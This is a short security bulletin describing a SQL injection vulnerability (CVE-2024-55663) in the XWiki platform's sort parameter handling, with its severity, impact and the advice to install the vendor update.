SB2024121267 - SQL injection in XWiki platform
Published: December 12, 2024 Updated: April 9, 2026
Security Bulletin ID
SB2024121267
Severity
High
Patch available
YES
Number of vulnerabilities
1
Exploitation vector
Remote access
Highest impact
Code execution
Breakdown by Severity
- Low
- Medium
- High
- Critical
Description
This security bulletin contains information about 1 security vulnerability.
1) SQL injection (CVE-ID: CVE-2024-55663)
The vulnerability allows a remote attacker to disclose sensitive information and modify database contents.
The vulnerability exists due to SQL injection in getdocument.vm when processing the request.sort parameter. A remote attacker can send a specially crafted request to disclose sensitive information and modify database contents.
Depending on the database backend, exploitation may allow access to confidential data such as password hashes and execution of UPDATE, INSERT, or DELETE queries.
Remediation
Install update from vendor's website.